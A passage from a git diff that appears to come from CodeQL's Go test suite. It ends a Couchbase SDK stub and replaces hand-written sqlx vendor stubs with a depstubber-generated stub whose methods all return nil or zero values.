Removes []TransactionDocRecord + State TransactionAttemptState + ForwardCompat map[string][]TransactionsForwardCompatibilityEntry +} + +type TransactionDocRecord struct { + CollectionName string + ScopeName string + BucketName string + ID string +} + +type TransactionGetResult struct{} + +func (_ *TransactionGetResult) Content(_ interface{}) error { + return nil +} + +type TransactionHooks interface { + AfterATRAborted(_ TransactionAttemptContext) error + AfterATRCommit(_ TransactionAttemptContext) error + AfterATRComplete(_ TransactionAttemptContext) error + AfterATRPending(_ TransactionAttemptContext) error + AfterATRRolledBack(_ TransactionAttemptContext) error + AfterDocCommitted(_ TransactionAttemptContext, _ string) error + AfterDocCommittedBeforeSavingCAS(_ TransactionAttemptContext, _ string) error + AfterDocRemovedPostRetry(_ TransactionAttemptContext, _ string) error + AfterDocRemovedPreRetry(_ TransactionAttemptContext, _ string) error + AfterDocsCommitted(_ TransactionAttemptContext) error + AfterDocsRemoved(_ TransactionAttemptContext) error + AfterGetComplete(_ TransactionAttemptContext, _ string) error + AfterQuery(_ TransactionAttemptContext, _ string) error + AfterRemoveStagedInsert(_ TransactionAttemptContext, _ string) error + AfterRollbackDeleteInserted(_ TransactionAttemptContext, _ string) error + AfterRollbackReplaceOrRemove(_ TransactionAttemptContext, _ string) error + AfterStagedInsertComplete(_ TransactionAttemptContext, _ string) error + AfterStagedRemoveComplete(_ TransactionAttemptContext, _ string) error + AfterStagedReplaceComplete(_ TransactionAttemptContext, _ string) error + BeforeATRAborted(_ TransactionAttemptContext) error + BeforeATRCommit(_ TransactionAttemptContext) error + BeforeATRCommitAmbiguityResolution(_ TransactionAttemptContext) error + BeforeATRComplete(_ TransactionAttemptContext) error + BeforeATRPending(_ TransactionAttemptContext) error + BeforeATRRolledBack(_ TransactionAttemptContext) error + BeforeCheckATREntryForBlockingDoc(_ TransactionAttemptContext, _ string) error + BeforeDocCommitted(_ TransactionAttemptContext, _ string) error + BeforeDocGet(_ TransactionAttemptContext, _ string) error + BeforeDocRemoved(_ TransactionAttemptContext, _ string) error + BeforeDocRolledBack(_ TransactionAttemptContext, _ string) error + BeforeGetDocInExistsDuringStagedInsert(_ TransactionAttemptContext, _ string) error + BeforeQuery(_ TransactionAttemptContext, _ string) error + BeforeRemoveStagedInsert(_ TransactionAttemptContext, _ string) error + BeforeRemovingDocDuringStagedInsert(_ TransactionAttemptContext, _ string) error + BeforeRollbackDeleteInserted(_ TransactionAttemptContext, _ string) error + BeforeStagedInsert(_ TransactionAttemptContext, _ string) error + BeforeStagedRemove(_ TransactionAttemptContext, _ string) error + BeforeStagedReplace(_ TransactionAttemptContext, _ string) error + HasExpiredClientSideHook(_ TransactionAttemptContext, _ string, _ string) (bool, error) + RandomATRIDForVbucket(_ TransactionAttemptContext) (string, error) +} + +type TransactionLogItem struct { + Level LogLevel +} + +func (_ TransactionLogItem) String() string { + return "" +} + +type TransactionOptions struct { + DurabilityLevel DurabilityLevel + Timeout time.Duration + MetadataCollection *Collection + Internal struct { + Hooks TransactionHooks + } +} + +type TransactionQueryOptions struct { + ScanConsistency QueryScanConsistency + Profile QueryProfileMode + ScanCap uint32 + PipelineBatch uint32 + PipelineCap uint32 + ScanWait time.Duration + Readonly bool + ClientContextID string + PositionalParameters []interface{} + NamedParameters map[string]interface{} + FlexIndex bool + Raw map[string]interface{} + Prepared bool + Scope *Scope +} + +type TransactionQueryResult struct{} + +func (_ *TransactionQueryResult) MetaData() (*QueryMetaData, error) { + return nil, nil +} + +func (_ *TransactionQueryResult) Next() bool { + return false +} + +func (_ *TransactionQueryResult) One(_ interface{}) error { + return nil +} + +func (_ *TransactionQueryResult) Row(_ interface{}) error { + return nil +} + +type TransactionResult struct { + TransactionID string + UnstagingComplete bool + Logs []TransactionLogItem +} + +type Transactions struct{} + +func (_ *Transactions) Internal() *TransactionsInternal { + return nil +} + +func (_ *Transactions) Run(_ AttemptFunc, _ *TransactionOptions) (*TransactionResult, error) { + return nil, nil +} + +type TransactionsForwardCompatibilityEntry struct { + ProtocolVersion string + ProtocolExtension string + Behaviour string + RetryInterval int +} + +type TransactionsInternal struct{} + +func (_ *TransactionsInternal) CleanupLocations() []interface{} { + return nil +} + +func (_ *TransactionsInternal) CleanupQueueLength() int32 { + return 0 +} + +func (_ *TransactionsInternal) ClientCleanupEnabled() bool { + return false +} + +func (_ *TransactionsInternal) ForceCleanupQueue() []TransactionCleanupAttempt { + return nil +} + +type Transcoder interface { + Decode(_ []byte, _ uint32, _ interface{}) error + Encode(_ interface{}) ([]byte, uint32, error) +} + +type UndeployEventingFunctionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type UnfreezePlanSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type UnlockOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type UpdateBucketOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type UpdateCollectionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type UpdateCollectionSettings struct { + MaxExpiry time.Duration + History *CollectionHistorySettings +} + +type UpsertDesignDocumentOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type UpsertEventingFunctionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type UpsertGroupOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type UpsertOptions struct { + Expiry time.Duration + PersistTo uint + ReplicateTo uint + DurabilityLevel DurabilityLevel + Transcoder Transcoder + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + PreserveExpiry bool + Context context.Context + Internal struct { + User string + } +} + +type UpsertSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type UpsertUserOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + DomainName string + ParentSpan RequestSpan + Context context.Context +} + +type User struct { + Username string + DisplayName string + Roles []Role + Groups []string + Password string +} + +type UserAndMetadata struct { + User + Domain AuthDomain + EffectiveRoles []RoleAndOrigins + ExternalGroups []string + PasswordChanged time.Time +} + +type UserManager struct{} + +func (_ *UserManager) ChangePassword(_ string, _ *ChangePasswordOptions) error { + return nil +} + +func (_ *UserManager) DropGroup(_ string, _ *DropGroupOptions) error { + return nil +} + +func (_ *UserManager) DropUser(_ string, _ *DropUserOptions) error { + return nil +} + +func (_ *UserManager) GetAllGroups(_ *GetAllGroupsOptions) ([]Group, error) { + return nil, nil +} + +func (_ *UserManager) GetAllUsers(_ *GetAllUsersOptions) ([]UserAndMetadata, error) { + return nil, nil +} + +func (_ *UserManager) GetGroup(_ string, _ *GetGroupOptions) (*Group, error) { + return nil, nil +} + +func (_ *UserManager) GetRoles(_ *GetRolesOptions) ([]RoleAndDescription, error) { + return nil, nil +} + +func (_ *UserManager) GetUser(_ string, _ *GetUserOptions) (*UserAndMetadata, error) { + return nil, nil +} + +func (_ *UserManager) UpsertGroup(_ Group, _ *UpsertGroupOptions) error { + return nil +} + +func (_ *UserManager) UpsertUser(_ User, _ *UpsertUserOptions) error { + return nil +} + +type View struct { + Map string + Reduce string +} + +type ViewErrorMode uint + +type ViewIndexManager struct{} + +func (_ *ViewIndexManager) DropDesignDocument(_ string, _ DesignDocumentNamespace, _ *DropDesignDocumentOptions) error { + return nil +} + +func (_ *ViewIndexManager) GetAllDesignDocuments(_ DesignDocumentNamespace, _ *GetAllDesignDocumentsOptions) ([]DesignDocument, error) { + return nil, nil +} + +func (_ *ViewIndexManager) GetDesignDocument(_ string, _ DesignDocumentNamespace, _ *GetDesignDocumentOptions) (*DesignDocument, error) { + return nil, nil +} + +func (_ *ViewIndexManager) PublishDesignDocument(_ string, _ *PublishDesignDocumentOptions) error { + return nil +} + +func (_ *ViewIndexManager) UpsertDesignDocument(_ DesignDocument, _ DesignDocumentNamespace, _ *UpsertDesignDocumentOptions) error { + return nil +} + +type ViewMetaData struct { + TotalRows uint64 + Debug interface{} +} + +type ViewOptions struct { + ScanConsistency ViewScanConsistency + Skip uint32 + Limit uint32 + Order ViewOrdering + Reduce bool + Group bool + GroupLevel uint32 + Key interface{} + Keys []interface{} + StartKey interface{} + EndKey interface{} + InclusiveEnd bool + StartKeyDocID string + EndKeyDocID string + OnError ViewErrorMode + Debug bool + ParentSpan RequestSpan + Raw map[string]string + Namespace DesignDocumentNamespace + Timeout time.Duration + RetryStrategy RetryStrategy + Context context.Context + Internal struct { + User string + } +} + +type ViewOrdering uint + +type ViewResult struct{} + +func (_ *ViewResult) Close() error { + return nil +} + +func (_ *ViewResult) Err() error { + return nil +} + +func (_ *ViewResult) MetaData() (*ViewMetaData, error) { + return nil, nil +} + +func (_ *ViewResult) Next() bool { + return false +} + +func (_ *ViewResult) Raw() *ViewResultRaw { + return nil +} + +func (_ *ViewResult) Row() ViewRow { + return ViewRow{} +} + +type ViewResultRaw struct{} + +func (_ *ViewResultRaw) Close() error { + return nil +} + +func (_ *ViewResultRaw) Err() error { + return nil +} + +func (_ *ViewResultRaw) MetaData() ([]byte, error) { + return nil, nil +} + +func (_ *ViewResultRaw) NextBytes() []byte { + return nil +} + +type ViewRow struct { + ID string +} + +func (_ *ViewRow) Key(_ interface{}) error { + return nil +} + +func (_ *ViewRow) Value(_ interface{}) error { + return nil +} + +type ViewScanConsistency uint + +type WaitUntilReadyOptions struct { + DesiredState ClusterState + ServiceTypes []ServiceType + Context context.Context + RetryStrategy RetryStrategy +} + +type WatchQueryIndexOptions struct { + WatchPrimary bool + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ScopeName string + CollectionName string + Context context.Context +} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/conn.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/conn.go deleted file mode 100644 index 28a0f913062f..000000000000 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/conn.go +++ /dev/null @@ -1,26 +0,0 @@ -package sqlx - -import ( - "context" - "database/sql" -) - -type Conn struct { - *sql.Conn -} - -func (c *Conn) GetContext(ctx context.Context, dest interface{}, query string, args ...interface{}) error { - return nil -} - -func (c *Conn) SelectContext(ctx context.Context, dest interface{}, query string, args ...interface{}) error { - return nil -} - -func (c *Conn) QueryRowxContext(ctx context.Context, query string, args ...interface{}) *Row { - return nil -} - -func (c *Conn) QueryxContext(ctx context.Context, query string, args ...interface{}) (*Rows, error) { - return nil, nil -} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/db.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/db.go deleted file mode 100644 index 4d50616a732f..000000000000 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/db.go +++ /dev/null @@ -1,52 +0,0 @@ -package sqlx - -import ( - "context" - "database/sql" -) - -type DB struct { - *sql.DB - - // Mapper *reflectx.Mapper -} - -func (db *DB) Get(dest interface{}, query string, args ...interface{}) error { - return nil -} - -func (db *DB) GetContext(ctx context.Context, dest interface{}, query string, args ...interface{}) error { - return nil -} - -func (db *DB) QueryRowx(query string, args ...interface{}) *Row { - return nil -} - -func (db *DB) QueryRowxContext(ctx context.Context, query string, args ...interface{}) *Row { - return nil -} - -func (db *DB) Queryx(query string, args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (db *DB) QueryxContext(ctx context.Context, query string, args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (db *DB) Select(dest interface{}, query string, args ...interface{}) error { - return nil -} - -func (db *DB) SelectContext(ctx context.Context, dest interface{}, query string, args ...interface{}) error { - return nil -} - -func (db *DB) NamedQuery(query string, arg interface{}) (*Rows, error) { - return nil, nil -} - -func (db *DB) NamedQueryContext(ctx context.Context, query string, arg interface{}) (*Rows, error) { - return nil, nil -} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/namedstmt.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/namedstmt.go deleted file mode 100644 index 59b647ff48e6..000000000000 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/namedstmt.go +++ /dev/null @@ -1,60 +0,0 @@ -package sqlx - -import ( - "context" - "database/sql" -) - -type NamedStmt struct { - Params []string - QueryString string - Stmt *sql.Stmt -} - -func (s *NamedStmt) Get(dest interface{}, args ...interface{}) error { - return nil -} - -func (s *NamedStmt) GetContext(ctx context.Context, dest interface{}, args ...interface{}) error { - return nil -} - -func (s *NamedStmt) QueryRow(args ...interface{}) *Row { - return nil -} - -func (s *NamedStmt) QueryRowContext(ctx context.Context, args ...interface{}) *Row { - return nil -} - -func (s *NamedStmt) Query(args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (s *NamedStmt) QueryContext(ctx context.Context, args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (s *NamedStmt) QueryRowx(args ...interface{}) *Row { - return nil -} - -func (s *NamedStmt) QueryRowxContext(ctx context.Context, args ...interface{}) *Row { - return nil -} - -func (s *NamedStmt) Queryx(args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (s *NamedStmt) QueryxContext(ctx context.Context, args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (s *NamedStmt) Select(dest interface{}, args ...interface{}) error { - return nil -} - -func (s *NamedStmt) SelectContext(ctx context.Context, dest interface{}, args ...interface{}) error { - return nil -} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/row.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/row.go deleted file mode 100644 index fb427e8f6579..000000000000 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/row.go +++ /dev/null @@ -1,21 +0,0 @@ -package sqlx - -type Row struct { - // Mapper *reflectx.Mapper -} - -func (r *Row) MapScan(dest map[string]interface{}) error { - return nil -} - -func (r *Row) StructScan(dest interface{}) error { - return nil -} - -func (r *Row) SliceScan(dest []interface{}) error { - return nil -} - -func (r *Row) Scan(dest ...interface{}) error { - return nil -} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/rows.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/rows.go deleted file mode 100644 index e70af447c4f0..000000000000 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/rows.go +++ /dev/null @@ -1,22 +0,0 @@ -package sqlx - -import "database/sql" - -type Rows struct { - *sql.Rows - - // Mapper *reflectx.Mapper - // contains filtered or unexported fields -} - -func (r *Rows) MapScan(dest map[string]interface{}) error { - return nil -} - -func (r *Rows) StructScan(dest interface{}) error { - return nil -} - -func (r *Rows) SliceScan(dest []interface{}) error { - return nil -} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/stmt.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/stmt.go deleted file mode 100644 index c634566d3ea8..000000000000 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/stmt.go +++ /dev/null @@ -1,42 +0,0 @@ -package sqlx - -import ( - "context" - "database/sql" -) - -type Stmt struct { - *sql.Stmt -} - -func (s *Stmt) Get(dest interface{}, args ...interface{}) error { - return nil -} - -func (s *Stmt) GetContext(ctx context.Context, dest interface{}, args ...interface{}) error { - return nil -} - -func (s *Stmt) QueryRowx(args ...interface{}) *Row { - return nil -} - -func (s *Stmt) QueryRowxContext(ctx context.Context, args ...interface{}) *Row { - return nil -} - -func (s *Stmt) Queryx(args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (s *Stmt) QueryxContext(ctx context.Context, args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (s *Stmt) Select(dest interface{}, args ...interface{}) error { - return nil -} - -func (s *Stmt) SelectContext(ctx context.Context, dest interface{}, args ...interface{}) error { - return nil -} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/stub.go index 888df0079618..da93fccb4e07 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/stub.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/stub.go @@ -1,67 +1,530 @@ +// Code generated by depstubber. DO NOT EDIT. +// This is a simple stub for github.com/jmoiron/sqlx, strictly for use in testing. + +// See the LICENSE file for information about the licensing of the original library. +// Source: github.com/jmoiron/sqlx (exports: Conn,DB,NamedStmt,Stmt,Tx; functions: Get,GetContext,NamedQuery,NamedQueryContext,Select,SelectContext) + +// Package sqlx is a stub of github.com/jmoiron/sqlx, generated by depstubber. package sqlx import ( - "context" - "database/sql" + context "context" + sql "database/sql" ) -type ColScanner interface { - Columns() ([]string, error) - Scan(dest ...interface{}) error - Err() error +type Conn struct { + *sql.Conn + Mapper interface{} +} + +func (_ Conn) BeginTx(_ context.Context, _ *sql.TxOptions) (*sql.Tx, error) { + return nil, nil +} + +func (_ Conn) Close() error { + return nil +} + +func (_ Conn) ExecContext(_ context.Context, _ string, _ ...interface{}) (sql.Result, error) { + return nil, nil +} + +func (_ Conn) PingContext(_ context.Context) error { + return nil +} + +func (_ Conn) PrepareContext(_ context.Context, _ string) (*sql.Stmt, error) { + return nil, nil +} + +func (_ Conn) QueryContext(_ context.Context, _ string, _ ...interface{}) (*sql.Rows, error) { + return nil, nil +} + +func (_ Conn) QueryRowContext(_ context.Context, _ string, _ ...interface{}) *sql.Row { + return nil +} + +func (_ Conn) Raw(_ func(interface{}) error) error { + return nil +} + +func (_ *Conn) BeginTxx(_ context.Context, _ *sql.TxOptions) (*Tx, error) { + return nil, nil +} + +func (_ *Conn) GetContext(_ context.Context, _ interface{}, _ string, _ ...interface{}) error { + return nil } -type Execer interface { - Exec(query string, args ...interface{}) (sql.Result, error) +func (_ *Conn) PreparexContext(_ context.Context, _ string) (*Stmt, error) { + return nil, nil } -type ExecerContext interface { - ExecContext(ctx context.Context, query string, args ...interface{}) (sql.Result, error) +func (_ *Conn) QueryRowxContext(_ context.Context, _ string, _ ...interface{}) *Row { + return nil +} + +func (_ *Conn) QueryxContext(_ context.Context, _ string, _ ...interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *Conn) Rebind(_ string) string { + return "" +} + +func (_ *Conn) SelectContext(_ context.Context, _ interface{}, _ string, _ ...interface{}) error { + return nil +} + +type DB struct { + *sql.DB + Mapper interface{} +} + +func (_ *DB) BeginTxx(_ context.Context, _ *sql.TxOptions) (*Tx, error) { + return nil, nil +} + +func (_ *DB) Beginx() (*Tx, error) { + return nil, nil +} + +func (_ *DB) BindNamed(_ string, _ interface{}) (string, []interface{}, error) { + return "", nil, nil +} + +func (_ *DB) Connx(_ context.Context) (*Conn, error) { + return nil, nil +} + +func (_ *DB) DriverName() string { + return "" +} + +func (_ *DB) Get(_ interface{}, _ string, _ ...interface{}) error { + return nil +} + +func (_ *DB) GetContext(_ context.Context, _ interface{}, _ string, _ ...interface{}) error { + return nil +} + +func (_ *DB) MapperFunc(_ func(string) string) {} + +func (_ *DB) MustBegin() *Tx { + return nil +} + +func (_ *DB) MustBeginTx(_ context.Context, _ *sql.TxOptions) *Tx { + return nil +} + +func (_ *DB) MustExec(_ string, _ ...interface{}) sql.Result { + return nil +} + +func (_ *DB) MustExecContext(_ context.Context, _ string, _ ...interface{}) sql.Result { + return nil +} + +func (_ *DB) NamedExec(_ string, _ interface{}) (sql.Result, error) { + return nil, nil +} + +func (_ *DB) NamedExecContext(_ context.Context, _ string, _ interface{}) (sql.Result, error) { + return nil, nil +} + +func (_ *DB) NamedQuery(_ string, _ interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *DB) NamedQueryContext(_ context.Context, _ string, _ interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *DB) PrepareNamed(_ string) (*NamedStmt, error) { + return nil, nil +} + +func (_ *DB) PrepareNamedContext(_ context.Context, _ string) (*NamedStmt, error) { + return nil, nil +} + +func (_ *DB) Preparex(_ string) (*Stmt, error) { + return nil, nil +} + +func (_ *DB) PreparexContext(_ context.Context, _ string) (*Stmt, error) { + return nil, nil +} + +func (_ *DB) QueryRowx(_ string, _ ...interface{}) *Row { + return nil +} + +func (_ *DB) QueryRowxContext(_ context.Context, _ string, _ ...interface{}) *Row { + return nil +} + +func (_ *DB) Queryx(_ string, _ ...interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *DB) QueryxContext(_ context.Context, _ string, _ ...interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *DB) Rebind(_ string) string { + return "" +} + +func (_ *DB) Select(_ interface{}, _ string, _ ...interface{}) error { + return nil +} + +func (_ *DB) SelectContext(_ context.Context, _ interface{}, _ string, _ ...interface{}) error { + return nil +} + +func (_ *DB) Unsafe() *DB { + return nil } type Ext interface { - Queryer - Execer + BindNamed(_ string, _ interface{}) (string, []interface{}, error) + DriverName() string + Exec(_ string, _ ...interface{}) (sql.Result, error) + Query(_ string, _ ...interface{}) (*sql.Rows, error) + QueryRowx(_ string, _ ...interface{}) *Row + Queryx(_ string, _ ...interface{}) (*Rows, error) + Rebind(_ string) string } type ExtContext interface { - QueryerContext - ExecerContext - // contains filtered or unexported methods + BindNamed(_ string, _ interface{}) (string, []interface{}, error) + DriverName() string + ExecContext(_ context.Context, _ string, _ ...interface{}) (sql.Result, error) + QueryContext(_ context.Context, _ string, _ ...interface{}) (*sql.Rows, error) + QueryRowxContext(_ context.Context, _ string, _ ...interface{}) *Row + QueryxContext(_ context.Context, _ string, _ ...interface{}) (*Rows, error) + Rebind(_ string) string +} + +func Get(_ Queryer, _ interface{}, _ string, _ ...interface{}) error { + return nil +} + +func GetContext(_ context.Context, _ QueryerContext, _ interface{}, _ string, _ ...interface{}) error { + return nil +} + +func NamedQuery(_ Ext, _ string, _ interface{}) (*Rows, error) { + return nil, nil +} + +func NamedQueryContext(_ context.Context, _ ExtContext, _ string, _ interface{}) (*Rows, error) { + return nil, nil +} + +type NamedStmt struct { + Params []string + QueryString string + Stmt *Stmt +} + +func (_ *NamedStmt) Close() error { + return nil +} + +func (_ *NamedStmt) Exec(_ interface{}) (sql.Result, error) { + return nil, nil +} + +func (_ *NamedStmt) ExecContext(_ context.Context, _ interface{}) (sql.Result, error) { + return nil, nil +} + +func (_ *NamedStmt) Get(_ interface{}, _ interface{}) error { + return nil +} + +func (_ *NamedStmt) GetContext(_ context.Context, _ interface{}, _ interface{}) error { + return nil +} + +func (_ *NamedStmt) MustExec(_ interface{}) sql.Result { + return nil +} + +func (_ *NamedStmt) MustExecContext(_ context.Context, _ interface{}) sql.Result { + return nil +} + +func (_ *NamedStmt) Query(_ interface{}) (*sql.Rows, error) { + return nil, nil +} + +func (_ *NamedStmt) QueryContext(_ context.Context, _ interface{}) (*sql.Rows, error) { + return nil, nil +} + +func (_ *NamedStmt) QueryRow(_ interface{}) *Row { + return nil +} + +func (_ *NamedStmt) QueryRowContext(_ context.Context, _ interface{}) *Row { + return nil +} + +func (_ *NamedStmt) QueryRowx(_ interface{}) *Row { + return nil +} + +func (_ *NamedStmt) QueryRowxContext(_ context.Context, _ interface{}) *Row { + return nil +} + +func (_ *NamedStmt) Queryx(_ interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *NamedStmt) QueryxContext(_ context.Context, _ interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *NamedStmt) Select(_ interface{}, _ interface{}) error { + return nil +} + +func (_ *NamedStmt) SelectContext(_ context.Context, _ interface{}, _ interface{}) error { + return nil +} + +func (_ *NamedStmt) Unsafe() *NamedStmt { + return nil } type Queryer interface { - Query(query string, args ...interface{}) (*sql.Rows, error) - Queryx(query string, args ...interface{}) (*Rows, error) - QueryRowx(query string, args ...interface{}) *Row + Query(_ string, _ ...interface{}) (*sql.Rows, error) + QueryRowx(_ string, _ ...interface{}) *Row + Queryx(_ string, _ ...interface{}) (*Rows, error) } type QueryerContext interface { - QueryContext(ctx context.Context, query string, args ...interface{}) (*sql.Rows, error) - QueryxContext(ctx context.Context, query string, args ...interface{}) (*Rows, error) - QueryRowxContext(ctx context.Context, query string, args ...interface{}) *Row + QueryContext(_ context.Context, _ string, _ ...interface{}) (*sql.Rows, error) + QueryRowxContext(_ context.Context, _ string, _ ...interface{}) *Row + QueryxContext(_ context.Context, _ string, _ ...interface{}) (*Rows, error) +} + +type Row struct { + Mapper interface{} +} + +func (_ *Row) ColumnTypes() ([]*sql.ColumnType, error) { + return nil, nil +} + +func (_ *Row) Columns() ([]string, error) { + return nil, nil +} + +func (_ *Row) Err() error { + return nil +} + +func (_ *Row) MapScan(_ map[string]interface{}) error { + return nil +} + +func (_ *Row) Scan(_ ...interface{}) error { + return nil +} + +func (_ *Row) SliceScan() ([]interface{}, error) { + return nil, nil +} + +func (_ *Row) StructScan(_ interface{}) error { + return nil +} + +type Rows struct { + *sql.Rows + Mapper interface{} +} + +func (_ *Rows) MapScan(_ map[string]interface{}) error { + return nil +} + +func (_ *Rows) SliceScan() ([]interface{}, error) { + return nil, nil +} + +func (_ *Rows) StructScan(_ interface{}) error { + return nil +} + +func Select(_ Queryer, _ interface{}, _ string, _ ...interface{}) error { + return nil +} + +func SelectContext(_ context.Context, _ QueryerContext, _ interface{}, _ string, _ ...interface{}) error { + return nil +} + +type Stmt struct { + *sql.Stmt + Mapper interface{} +} + +func (_ *Stmt) Get(_ interface{}, _ ...interface{}) error { + return nil +} + +func (_ *Stmt) GetContext(_ context.Context, _ interface{}, _ ...interface{}) error { + return nil +} + +func (_ *Stmt) MustExec(_ ...interface{}) sql.Result { + return nil +} + +func (_ *Stmt) MustExecContext(_ context.Context, _ ...interface{}) sql.Result { + return nil +} + +func (_ *Stmt) QueryRowx(_ ...interface{}) *Row { + return nil +} + +func (_ *Stmt) QueryRowxContext(_ context.Context, _ ...interface{}) *Row { + return nil +} + +func (_ *Stmt) Queryx(_ ...interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *Stmt) QueryxContext(_ context.Context, _ ...interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *Stmt) Select(_ interface{}, _ ...interface{}) error { + return nil +} + +func (_ *Stmt) SelectContext(_ context.Context, _ interface{}, _ ...interface{}) error { + return nil +} + +func (_ *Stmt) Unsafe() *Stmt { + return nil +} + +type Tx struct { + *sql.Tx + Mapper interface{} +} + +func (_ *Tx) BindNamed(_ string, _ interface{}) (string, []interface{}, error) { + return "", nil, nil +} + +func (_ *Tx) DriverName() string { + return "" +} + +func (_ *Tx) Get(_ interface{}, _ string, _ ...interface{}) error { + return nil +} + +func (_ *Tx) GetContext(_ context.Context, _ interface{}, _ string, _ ...interface{}) error { + return nil +} + +func (_ *Tx) MustExec(_ string, _ ...interface{}) sql.Result { + return nil +} + +func (_ *Tx) MustExecContext(_ context.Context, _ string, _ ...interface{}) sql.Result { + return nil +} + +func (_ *Tx) NamedExec(_ string, _ interface{}) (sql.Result, error) { + return nil, nil +} + +func (_ *Tx) NamedExecContext(_ context.Context, _ string, _ interface{}) (sql.Result, error) { + return nil, nil +} + +func (_ *Tx) NamedQuery(_ string, _ interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *Tx) NamedStmt(_ *NamedStmt) *NamedStmt { + return nil +} + +func (_ *Tx) NamedStmtContext(_ context.Context, _ *NamedStmt) *NamedStmt { + return nil +} + +func (_ *Tx) PrepareNamed(_ string) (*NamedStmt, error) { + return nil, nil } -func NamedQuery(e Ext, query string, arg interface{}) (*Rows, error) { - return e.Queryx(query, arg) +func (_ *Tx) PrepareNamedContext(_ context.Context, _ string) (*NamedStmt, error) { + return nil, nil } -func NamedQueryContext(ctx context.Context, e ExtContext, query string, arg interface{}) (*Rows, error) { - return e.QueryxContext(ctx, query, arg) +func (_ *Tx) Preparex(_ string) (*Stmt, error) { + return nil, nil +} + +func (_ *Tx) PreparexContext(_ context.Context, _ string) (*Stmt, error) { + return nil, nil +} + +func (_ *Tx) QueryRowx(_ string, _ ...interface{}) *Row { + return nil +} + +func (_ *Tx) QueryRowxContext(_ context.Context, _ string, _ ...interface{}) *Row { + return nil +} + +func (_ *Tx) Queryx(_ string, _ ...interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *Tx) QueryxContext(_ context.Context, _ string, _ ...interface{}) (*Rows, error) { + return nil, nil +} + +func (_ *Tx) Rebind(_ string) string { + return "" +} + +func (_ *Tx) Select(_ interface{}, _ string, _ ...interface{}) error { + return nil } -func Get(q Queryer, dest interface{}, query string, args ...interface{}) error { +func (_ *Tx) SelectContext(_ context.Context, _ interface{}, _ string, _ ...interface{}) error { return nil } -func GetContext(ctx context.Context, q QueryerContext, dest interface{}, query string, args ...interface{}) error { +func (_ *Tx) Stmtx(_ interface{}) *Stmt { return nil } -func Select(q Queryer, 